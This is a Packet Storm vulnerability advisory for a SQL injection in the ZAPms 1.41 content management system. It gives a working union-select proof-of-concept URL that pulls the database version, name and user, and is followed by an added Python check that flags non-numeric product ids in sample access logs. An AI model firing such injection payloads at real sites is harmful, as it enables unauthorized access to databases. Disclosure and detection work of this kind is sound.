ZAPms 1.41 SQL Injection

2013-04-10T00:00:00
ID PACKETSTORM:121202
Type packetstorm
Reporter NoGe
Modified 2013-04-10T00:00:00

Description

                                        
`=============================================================================================================
  
  
[o] ZAPms <= SQL Injection Vulnerability  
  
Software : ZAPms  
Version : 1.41  
Vendor : http://www.zapms.de  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Desc : ZAPms is a free, open source web content management system,
adapted to the needs of businesses on the Internet.
ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
  
  
=============================================================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/products?pid=[SQLi]  
  
  
=============================================================================================================  
  
  
[o] PoC  
  
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product  
  
  
=============================================================================================================  
  
  
[o] Greetz  
  
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory  
aJe kaka11 matthews wishnusakti inc0mp13te martfella  
pizzyroot Genex H312Y noname tukulesto }^-^{  
  
  
=============================================================================================================  
  
  
[o] April 09 2013 - Papua, Indonesia  
`
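
Added example, not part of the original advisory or of ZAPms itself: a Python check that flags requests to the products page whose pid parameter is not a plain integer, run over constructed access-log lines. It assumes pid is a numeric product id and that logs use the combined format; the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: pid is a non-negative integer product id (the advisory does not show the schema).
PID_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def valid_pid(value):
    """Allow-list check: digits only, so SQL syntax cannot reach the query."""
    return PID_RE.fullmatch(value) is not None


def suspicious_pid_requests(log_lines):
    """Return (line_no, decoded pid) for /products requests whose pid is not numeric."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.rstrip("/").endswith("/products"):
            continue
        # parse_qs decodes %xx and '+', so encoded values are compared in clear form.
        for pid in parse_qs(url.query, keep_blank_values=True).get("pid", []):
            if not valid_pid(pid):
                hits.append((n, pid))
    return hits


# Constructed sample log lines (not real traffic); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2013:10:00:01 +0000] "GET /test/products?pid=14&cid=0&action=details HTTP/1.1" 200 5120',
    '192.0.2.66 - - [10/Apr/2013:10:00:07 +0000] "GET /test/products?pid=-14+union+select+1,2,3--&cid=0 HTTP/1.1" 200 5300',
    '192.0.2.66 - - [10/Apr/2013:10:00:09 +0000] "GET /test/products?pid=14%20UNION%20SELECT%201 HTTP/1.1" 200 5300',
    '192.0.2.10 - - [10/Apr/2013:10:00:12 +0000] "GET /test/index?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, pid in suspicious_pid_requests(SAMPLE_LOG):
        print(f"line {line_no}: non-numeric pid {pid!r}")
```

Log matching only surfaces attempts. The same allow-list check belongs in the application, in front of a parameterized query for the product lookup.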